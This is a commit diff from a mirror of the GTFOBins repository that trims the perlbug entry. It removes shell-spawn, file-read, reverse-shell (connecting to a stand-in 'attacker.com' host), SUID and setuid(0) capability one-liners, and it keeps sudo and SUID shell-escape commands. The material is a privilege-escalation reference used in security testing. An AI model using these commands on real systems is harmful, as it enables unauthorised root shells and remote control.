1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Remove wrong functions

This commit is contained in:
Andrea Cardaci 2022-12-16 13:56:40 +01:00 committed by GitHub
parent 5d33f3c5c2
commit 3122cac682
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,21 +1,7 @@
---
functions:
shell:
- code: perlbug -e 'exec "/bin/sh";'
file-read:
- code: |
LFILE=file_to_read
perlbug -ne print $LFILE
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
perlbug -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
suid:
- code: ./perlbug -e 'exec "/bin/sh";'
- code: perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
sudo:
- code: sudo perlbug -e 'exec "/bin/sh";'
capabilities:
- code: ./perlbug -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
- code: sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'
---